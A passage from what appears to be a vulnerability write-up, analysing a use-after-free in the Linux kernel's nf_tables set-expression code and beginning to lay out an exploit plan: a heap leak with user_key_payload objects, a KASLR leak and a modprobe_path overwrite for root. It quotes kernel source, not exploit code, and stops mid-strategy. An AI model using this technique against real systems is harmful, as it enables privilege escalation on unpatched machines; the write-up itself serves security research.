    <span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="o">*</span><span class="n">i</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">nft_set_iter</span> <span class="n">iter</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">use</span> <span class="o">==</span> <span class="n">UINT_MAX</span><span class="p">)</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EOVERFLOW</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span>
        <span class="k">return</span> <span class="o">-</span><span class="n">EBUSY</span><span class="p">;</span>

    <span class="p">...</span>

<span class="nl">bind:</span>                          
    <span class="n">binding</span><span class="o">-&gt;</span><span class="n">chain</span> <span class="o">=</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">chain</span><span class="p">;</span>
    <span class="n">list_add_tail_rcu</span><span class="p">(</span><span class="o">&amp;</span><span class="n">binding</span><span class="o">-&gt;</span><span class="n">list</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">);</span>
    <span class="n">nft_set_trans_bind</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span>
    <span class="n">set</span><span class="o">-&gt;</span><span class="n">use</span><span class="o">++</span><span class="p">;</span>

    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that it calls the function <code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code> to bind the expression to the set. In <code class="language-plaintext highlighter-rouge">nf_tables_bind_set</code> we can see that it fails if the bindings are not empty but the set is anonymous. So for the binding to succeed the set that we are performing the <strong>lookup</strong> at shouldn’t be anonymous.</p>
<blockquote>
  <p>If we want a set to be non-anonymous we can just not set the anonymous flag when creating it.</p>
</blockquote>

<p>We already established that when adding an expression to a set the <code class="language-plaintext highlighter-rouge">nft_expr_init</code> function gets called by <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code>. Let’s take a look at it.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="nf">nft_set_elem_expr_alloc</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                     <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">,</span>
                     <span class="k">const</span> <span class="k">struct</span> <span class="n">nlattr</span> <span class="o">*</span><span class="n">attr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">;</span>
    <span class="kt">int</span> <span class="n">err</span><span class="p">;</span>

    <span class="n">expr</span> <span class="o">=</span> <span class="n">nft_expr_init</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">attr</span><span class="p">);</span> <span class="c1">// [1]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">IS_ERR</span><span class="p">(</span><span class="n">expr</span><span class="p">))</span>
        <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

    <span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EOPNOTSUPP</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_STATEFUL</span><span class="p">))</span> <span class="c1">// [2]</span>
        <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_EXPR_GC</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">NFT_SET_TIMEOUT</span><span class="p">)</span>
            <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">)</span>
            <span class="k">goto</span> <span class="n">err_set_elem_expr</span><span class="p">;</span>
        <span class="n">set</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">gc_init</span><span class="p">(</span><span class="n">set</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="k">return</span> <span class="n">expr</span><span class="p">;</span>

<span class="nl">err_set_elem_expr:</span>
    <span class="n">nft_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span> <span class="c1">// [3]</span>
    <span class="k">return</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="n">err</span><span class="p">);</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">nft_expr_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">nf_tables_expr_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span>
    <span class="n">kfree</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>
<span class="p">}</span>

<span class="k">static</span> <span class="kt">void</span> <span class="nf">nf_tables_expr_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                   <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_type</span> <span class="o">*</span><span class="n">type</span> <span class="o">=</span> <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">type</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">)</span>
        <span class="n">expr</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">expr</span><span class="p">);</span> <span class="c1">// [4]</span>
    <span class="n">module_put</span><span class="p">(</span><span class="n">type</span><span class="o">-&gt;</span><span class="n">owner</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see the call to <code class="language-plaintext highlighter-rouge">nft_expr_init</code> that eventually results in the <strong>lookup</strong> expression being bound to the set. At <code class="language-plaintext highlighter-rouge">[2]</code> we can see that a check is performed to see if the flag <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> is present and if not it calls <code class="language-plaintext highlighter-rouge">nft_expr_destroy</code>. <code class="language-plaintext highlighter-rouge">nft_expr_destroy</code> itself calls <code class="language-plaintext highlighter-rouge">nf_tables_expr_destroy</code> which calls the expression-specific <code class="language-plaintext highlighter-rouge">ops-&gt;destroy</code> function.</p>

<p>Let’s look at the lookup expression’s destroy function - <code class="language-plaintext highlighter-rouge">nft_lookup_destroy</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">nft_lookup_destroy</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span>
                   <span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr</span> <span class="o">*</span><span class="n">expr</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">struct</span> <span class="n">nft_lookup</span> <span class="o">*</span><span class="n">priv</span> <span class="o">=</span> <span class="n">nft_expr_priv</span><span class="p">(</span><span class="n">expr</span><span class="p">);</span>

    <span class="n">nf_tables_destroy_set</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">priv</span><span class="o">-&gt;</span><span class="n">set</span><span class="p">);</span> <span class="c1">// [1]</span>
<span class="p">}</span>

<span class="kt">void</span> <span class="nf">nf_tables_destroy_set</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">nft_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">,</span> <span class="k">struct</span> <span class="n">nft_set</span> <span class="o">*</span><span class="n">set</span><span class="p">)</span>
<span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">list_empty</span><span class="p">(</span><span class="o">&amp;</span><span class="n">set</span><span class="o">-&gt;</span><span class="n">bindings</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">nft_set_is_anonymous</span><span class="p">(</span><span class="n">set</span><span class="p">))</span> <span class="c1">// [2]</span>
        <span class="n">nft_set_destroy</span><span class="p">(</span><span class="n">ctx</span><span class="p">,</span> <span class="n">set</span><span class="p">);</span> 
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> in <code class="language-plaintext highlighter-rouge">nft_lookup_destroy</code> a call is performed to <code class="language-plaintext highlighter-rouge">nf_tables_destroy_set</code> to destroy the set it bounded to <strong>if possible</strong>. At <code class="language-plaintext highlighter-rouge">[2]</code> a check is performed to see if it is safe to destroy the set - if the bindings are empty and the set is anonymous. However, the set won’t be destroyed if it is named or if has any bindings - and it will always have at least a single binding because the expression got bound to it prior to being destroyed.</p>

<p>So the problem is that in the function <code class="language-plaintext highlighter-rouge">nft_set_elem_expr_alloc</code> the call to <code class="language-plaintext highlighter-rouge">nft_expr_init</code> is performed <strong>before</strong> it is checked if the expression has the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag. This means that if an expression without the stateful flag is passed, the expression will be initiated fully first and bound to the set before it gets destroyed because the flag is missing.</p>

<p>So what happens when we pass an expression without <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code>? The expression will get bound to the set before the expression gets destroyed. However, the set that it is bound to won’t get destroyed because its bindings are not empty. And as we see in the functions above there is no handling in this case. The expression already got bound to the set and it will stay bound. A pointer to it will remain in the <code class="language-plaintext highlighter-rouge">bindings</code> linked list of the set even though the expression got destroyed and its memory got freed. So now the linked list at <code class="language-plaintext highlighter-rouge">set-&gt;bindings</code> contains a pointer to freed memory. A Use-After-Free arises.</p>

<h2 id="exploitation-">Exploitation <a name="exploitation"></a></h2>
<p>The way this vulnerability is exploited depends on the kernel version of the target. 
If the target is pre-version <code class="language-plaintext highlighter-rouge">5.14</code> there is just <code class="language-plaintext highlighter-rouge">kmalloc-&lt;n&gt;</code> (<code class="language-plaintext highlighter-rouge">KMALLOC_NORMAL</code>) slab caches. After this version, there are two different types of caches - for accounted objects and unaccounted ones. Accounted objects are allocated using the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> and they go to <code class="language-plaintext highlighter-rouge">kmalloc-cg-&lt;n&gt;</code> (<code class="language-plaintext highlighter-rouge">KMALLOC_CGROUP</code>) caches. Unaccounted objects use the old flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> and go into the legacy <code class="language-plaintext highlighter-rouge">kmalloc-&lt;n&gt;</code> caches. This is important as in later versions where separate caches are present for accounted and unaccounted objects, the <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression is still unaccounted for, i.e. gets allocated with the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code>. Therefore in order to exploit the Use-After-Free vulnerability the objects that we are going to use as primitives must also be allocated with the <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> flag in versions that use the new <code class="language-plaintext highlighter-rouge">kmalloc-cg-&lt;n&gt;</code> caches.</p>

<p>My goal was to write a version-agnostic exploit. To do that I only used objects that are still allocated with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> even on newer versions. This way the exploit is viable with the older and newer cache implementations.</p>

<p>The exploit can be divided into three essential stages - leaking a heap address, leaking KASLR and overwriting <code class="language-plaintext highlighter-rouge">modprobe_path</code> to escalate our privileges.</p>

<blockquote>
  <p>It’s important to note that the exploit was tested on 5.12.0 as this was what I had laying around. Version 5.12 is before kmalloc-cg-&lt;n&gt; caches were introduced.</p>
</blockquote>

<h3 id="requirements-">Requirements <a name="requirements"></a></h3>
<p>To be able to exploit the vulnerability you need <code class="language-plaintext highlighter-rouge">CAP_NET_ADMIN</code>. That shouldn’t be a problem in most cases as that capability can be obtained in a <code class="language-plaintext highlighter-rouge">user+net</code> namespace. So our only requirement is that we can create <code class="language-plaintext highlighter-rouge">user</code> and <code class="language-plaintext highlighter-rouge">network</code> namespaces.</p>

<h3 id="leaking-a-heap-address-">Leaking a heap address <a name="heapaddr"></a></h3>
<p>It is essential to be able to leak a heap address as we are going to need one to successfully fool the kernel and bypass some security protections in the KASLR leaking stage but more on that later. Let’s now look into how we are going to leak the heap address.</p>

<p>We already established that the Use-After-Free occurs because we are left with a pointer to the binding of an <code class="language-plaintext highlighter-rouge">nft_lookup</code> expression that has been freed. 
Every expression in <code class="language-plaintext highlighter-rouge">nf_tables</code> is of the abstract type <code class="language-plaintext highlighter-rouge">nft_expr</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/**
 *	struct nft_expr - nf_tables expression
 *
 *	@ops: expression ops
 *	@data: expression private data
 */</span>
<span class="k">struct</span> <span class="n">nft_expr</span> <span class="p">{</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_expr_ops</span>	<span class="o">*</span><span class="n">ops</span><span class="p">;</span> <span class="c1">// nft_lookup_ops in our case (8 bytes)</span>
	<span class="kt">unsigned</span> <span class="kt">char</span>			<span class="n">data</span><span class="p">[]</span> <span class="c1">// this holds the nft_lookup object </span>
		<span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">))));</span> <span class="c1">// aligned 8 bytes</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_lookup</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">nft_set</span>			<span class="o">*</span><span class="n">set</span><span class="p">;</span> <span class="c1">// @8 (8 bytes) </span>
	<span class="n">u8</span>				<span class="n">sreg</span><span class="p">;</span> <span class="c1">// @16 (1 byte)</span>
	<span class="n">u8</span>				<span class="n">dreg</span><span class="p">;</span> <span class="c1">// @17 (1 byte)</span>
	<span class="n">bool</span>				<span class="n">invert</span><span class="p">;</span> <span class="c1">// @18 (also takes at east a byte)</span>
	<span class="k">struct</span> <span class="n">nft_set_binding</span>		<span class="n">binding</span><span class="p">;</span> <span class="c1">// @24 (16 bytes)</span>
	<span class="c1">// @24 because 8-byte aligned because first member is a pointer</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">nft_set_binding</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span>		<span class="n">list</span><span class="p">;</span> <span class="c1">// @24; (2 pointers - 16 bytes)</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">nft_chain</span>		<span class="o">*</span><span class="n">chain</span><span class="p">;</span> <span class="c1">// @40 (8 bytes)</span>
	<span class="n">u32</span>				<span class="n">flags</span><span class="p">;</span> <span class="c1">// @48 (4 bytes)</span>
<span class="p">};</span>

</code></pre></div></div>
<p>Here the <code class="language-plaintext highlighter-rouge">data</code> in <code class="language-plaintext highlighter-rouge">nft_expr</code> holds <code class="language-plaintext highlighter-rouge">struct nft_lookup</code>. The size of <code class="language-plaintext highlighter-rouge">struct nft_expr</code> whenever it holds an expression of type <code class="language-plaintext highlighter-rouge">nft_lookup</code> is <code class="language-plaintext highlighter-rouge">0x34 = 52 bytes</code>. This indicates allocation in <code class="language-plaintext highlighter-rouge">kmalloc-64</code>. 
Therefore we are looking for primitives also in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> that are being allocated with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> on versions with separate slab caches.</p>

<h4 id="method-of-exploitation-">Method of Exploitation <a name="heapaddrmethod"></a></h4>
<p>In order to leak a heap address we have to trigger the writing of a heap address into the freed memory object. That is trivially done by adding two <code class="language-plaintext highlighter-rouge">nft_lookup</code> expressions one after the other that target the same set. Let’s call those two lookup expressions <code class="language-plaintext highlighter-rouge">Object 1</code> and <code class="language-plaintext highlighter-rouge">Object 2</code>.
As we already established, all the lookup expressions that target a certain set are in a linked list through their <code class="language-plaintext highlighter-rouge">bindings</code>. 
If we add a lookup expression without the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag it will get bound to the set through its <code class="language-plaintext highlighter-rouge">binding</code> and then freed - this is our <code class="language-plaintext highlighter-rouge">Object 1</code>. Now if we add a second lookup expression (<code class="language-plaintext highlighter-rouge">Object 2</code>) that targets the same set it will also be added to the same linked list. Therefore now the set and both of these lookup expressions are in a linked list together. This means that the <code class="language-plaintext highlighter-rouge">binding.next</code> pointer of <code class="language-plaintext highlighter-rouge">Object 1</code> is going to hold the address of the <code class="language-plaintext highlighter-rouge">binding</code> of <code class="language-plaintext highlighter-rouge">Object 2</code>. However, as we know <code class="language-plaintext highlighter-rouge">Object 1</code> got freed prior to the allocation of <code class="language-plaintext highlighter-rouge">Object 2</code>. Therefore if we allocate an object we control (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>) in the same space in memory where <code class="language-plaintext highlighter-rouge">Object 1</code> got previously allocated now we have control over the memory where <code class="language-plaintext highlighter-rouge">Object 1</code> is supposed to be. Consequently when <code class="language-plaintext highlighter-rouge">Object 2</code> gets added the kernel thinks it is writing its address to the <code class="language-plaintext highlighter-rouge">binding.next</code> of <code class="language-plaintext highlighter-rouge">Object 1</code> but in reality, it is writing it somewhere in the scope of <code class="language-plaintext highlighter-rouge">Fake Object 1</code> that we control and can read from.</p>

<p>Important to mention here that the object we choose to allocate as <code class="language-plaintext highlighter-rouge">Fake Object 1</code> must be <code class="language-plaintext highlighter-rouge">kmalloc-64</code> and be allocated with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code>.</p>

<p>Summarizing:</p>
<ul>
  <li>Allocate lookup expression (<code class="language-plaintext highlighter-rouge">Object 1</code>) without the <code class="language-plaintext highlighter-rouge">NFT_EXPR_STATEFUL</code> flag targetting  <code class="language-plaintext highlighter-rouge">Set 1</code>. It will get bound to the set and then freed.</li>
  <li>Initiate an object under our control (<code class="language-plaintext highlighter-rouge">Fake Object 1</code>) that will get allocated at the same memory allocation where <code class="language-plaintext highlighter-rouge">Object 1</code> was allocated.</li>
  <li>Add another lookup expression (<code class="language-plaintext highlighter-rouge">Object 2</code>) that also targets <code class="language-plaintext highlighter-rouge">Set 1</code>. Now <code class="language-plaintext highlighter-rouge">Object 1.binding</code> and <code class="language-plaintext highlighter-rouge">Object 2.binding</code> are in a linked list. However <code class="language-plaintext highlighter-rouge">Object 1</code> doesn’t exist anymore so actually the address of <code class="language-plaintext highlighter-rouge">Object 2.binding</code> is written in the scope of <code class="language-plaintext highlighter-rouge">Fake Object 1</code>.</li>
  <li>Read <code class="language-plaintext highlighter-rouge">Fake Object 1</code> and leak the address of <code class="language-plaintext highlighter-rouge">Object 2</code>.</li>
</ul>

<p>Now we established what our methodology for the heap leak is. Now it is time we find a primitive that we can use for <code class="language-plaintext highlighter-rouge">Fake Object 1</code>.</p>

<h4 id="searching-for-a-primitive-">Searching for a primitive <a name="primitive"></a></h4>
<p>Objects used in the POSIX message queue filesystem have commonly been used as primitives due to the high degree of control we possess over them. For example, the <code class="language-plaintext highlighter-rouge">msg_msg</code> could have been a candidate here - we can control its size and reading memory with it is easy.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* one msg_msg structure for each message */</span>
<span class="k">struct</span> <span class="n">msg_msg</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">list_head</span> <span class="n">m_list</span><span class="p">;</span> 
	<span class="kt">long</span> <span class="n">m_type</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">m_ts</span><span class="p">;</span>		<span class="cm">/* message text size */</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>
	<span class="kt">void</span> <span class="o">*</span><span class="n">security</span><span class="p">;</span>
	<span class="cm">/* the actual message follows immediately */</span>
<span class="p">};</span>
</code></pre></div></div>
<p>However, the header of <code class="language-plaintext highlighter-rouge">msg_msg</code> is six 8-byte words or 48 bytes. This means that <code class="language-plaintext highlighter-rouge">binding.next</code> won’t be overlapping with the readable section (the actual message section) but with <code class="language-plaintext highlighter-rouge">m_type</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* ipc/msgutil.c */</span>
<span class="k">static</span> <span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="nf">alloc_msg</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">msg_msg</span> <span class="o">*</span><span class="n">msg</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">msg_msgseg</span> <span class="o">**</span><span class="n">pseg</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">alen</span><span class="p">;</span>

	<span class="n">alen</span> <span class="o">=</span> <span class="n">min</span><span class="p">(</span><span class="n">len</span><span class="p">,</span> <span class="n">DATALEN_MSG</span><span class="p">);</span>
	<span class="n">msg</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">msg</span><span class="p">)</span> <span class="o">+</span> <span class="n">alen</span><span class="p">,</span> <span class="n">GFP_KERNEL_ACCOUNT</span><span class="p">);</span> <span class="c1">// [1]</span>
	<span class="p">...</span>
	<span class="k">return</span> <span class="n">msg</span><span class="p">;</span>

<span class="nl">out_err:</span>
	<span class="n">free_msg</span><span class="p">(</span><span class="n">msg</span><span class="p">);</span>
	<span class="k">return</span> <span class="nb">NULL</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that <code class="language-plaintext highlighter-rouge">msg_msg</code> gets allocated with the flag <code class="language-plaintext highlighter-rouge">GFP_KERNEL_ACCOUNT</code> and that is another reason why it is not viable as a primitive.</p>

<h5 id="struct-user_key_payload-">struct user_key_payload <a name="user_key_payload"></a></h5>
<p>A viable primitive was found in the face of <code class="language-plaintext highlighter-rouge">user_key_payload</code>. It belongs to the kernel’s key management facility. It holds the payload for keys of type <code class="language-plaintext highlighter-rouge">user</code> and <code class="language-plaintext highlighter-rouge">logon</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* include/keys/user-type.h */</span>
<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">rcu_head</span>	<span class="n">rcu</span><span class="p">;</span>		<span class="cm">/* RCU destructor */</span> <span class="c1">// @0 - 16 bytes</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>	<span class="n">datalen</span><span class="p">;</span>	<span class="cm">/* length of this data */</span> <span class="c1">// @16 - 2 bytes</span>
	<span class="kt">char</span>		<span class="n">data</span><span class="p">[]</span> <span class="n">__aligned</span><span class="p">(</span><span class="n">__alignof__</span><span class="p">(</span><span class="n">u64</span><span class="p">));</span> <span class="cm">/* actual data */</span> <span class="c1">// @24</span>
<span class="p">};</span>

<span class="cm">/* include/linux/types.h
 * struct callback_head - callback structure for use with RCU and task_work
 * @next: next update requests in a list
 * @func: actual update function to call after the grace period.
 * ...
 */</span>
<span class="k">struct</span> <span class="n">callback_head</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">next</span><span class="p">;</span>
	<span class="kt">void</span> <span class="p">(</span><span class="o">*</span><span class="n">func</span><span class="p">)(</span><span class="k">struct</span> <span class="n">callback_head</span> <span class="o">*</span><span class="n">head</span><span class="p">);</span>
<span class="p">}</span> <span class="n">__attribute__</span><span class="p">((</span><span class="n">aligned</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">void</span> <span class="o">*</span><span class="p">))));</span>
<span class="cp">#define rcu_head callback_head
</span></code></pre></div></div>
<p>Let’s take a look at the function responsible for allocating <code class="language-plaintext highlighter-rouge">user_key_payload</code>.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* security/keys/user_defined.c */</span>
<span class="kt">int</span> <span class="nf">user_preparse</span><span class="p">(</span><span class="k">struct</span> <span class="n">key_preparsed_payload</span> <span class="o">*</span><span class="n">prep</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">user_key_payload</span> <span class="o">*</span><span class="n">upayload</span><span class="p">;</span>
	<span class="kt">size_t</span> <span class="n">datalen</span> <span class="o">=</span> <span class="n">prep</span><span class="o">-&gt;</span><span class="n">datalen</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">datalen</span> <span class="o">&lt;=</span> <span class="mi">0</span> <span class="o">||</span> <span class="n">datalen</span> <span class="o">&gt;</span> <span class="mi">32767</span> <span class="o">||</span> <span class="o">!</span><span class="n">prep</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

	<span class="n">upayload</span> <span class="o">=</span> <span class="n">kmalloc</span><span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">upayload</span><span class="p">)</span> <span class="o">+</span> <span class="n">datalen</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span> <span class="c1">// [1]</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">upayload</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

	<span class="cm">/* attach the data */</span>
	<span class="n">prep</span><span class="o">-&gt;</span><span class="n">quotalen</span> <span class="o">=</span> <span class="n">datalen</span><span class="p">;</span>
	<span class="n">prep</span><span class="o">-&gt;</span><span class="n">payload</span><span class="p">.</span><span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">=</span> <span class="n">upayload</span><span class="p">;</span>
	<span class="n">upayload</span><span class="o">-&gt;</span><span class="n">datalen</span> <span class="o">=</span> <span class="n">datalen</span><span class="p">;</span>
	<span class="n">memcpy</span><span class="p">(</span><span class="n">upayload</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">prep</span><span class="o">-&gt;</span><span class="n">data</span><span class="p">,</span> <span class="n">datalen</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">EXPORT_SYMBOL_GPL</span><span class="p">(</span><span class="n">user_preparse</span><span class="p">);</span>
</code></pre></div></div>
<p>At <code class="language-plaintext highlighter-rouge">[1]</code> we can see that the allocation is performed with <code class="language-plaintext highlighter-rouge">GFP_KERNEL</code> flag therefore it is a viable primitive. Let’s take a look at how it overlaps with <code class="language-plaintext highlighter-rouge">nft_expr[nft_lookup]</code>.</p>
<pre><code class="language-txt">nft_expr that holds nft_lookup | user_key_payload
=================================================
0x0: *ops                      | rcu_head.next
0x8: *set                      | rcu_head.func
0x10: sreg/dreg/invert         | rcu_head.datalen
0x18: binding.next             | data[0]
0x20: binding.prev             | data[8]
</code></pre>
<p>We can see here that <code class="language-plaintext highlighter-rouge">binding.next</code> of <code class="language-plaintext highlighter-rouge">nft_lookup</code> overlaps with <code class="language-plaintext highlighter-rouge">data[0]</code> of <code class="language-plaintext highlighter-rouge">user_key_payload</code>. This suits our purposes as the value of <code class="language-plaintext highlighter-rouge">binding.next</code> will be written in <code class="language-plaintext highlighter-rouge">data[0:8]</code>.</p>

<p>So now our exploitation strategy is:</p>
<ul>
  <li>Add a lookup expression (<code class="language-plaintext highlighter-rouge">Obj 1</code>) so it gets bound and then freed.</li>
  <li>Add a user key (<code class="language-plaintext highlighter-rouge">Fake Obj 1</code>) with payload size such that it would get allocated in <code class="language-plaintext highlighter-rouge">kmalloc-64</code> and where the UAF’d expression was.</li>
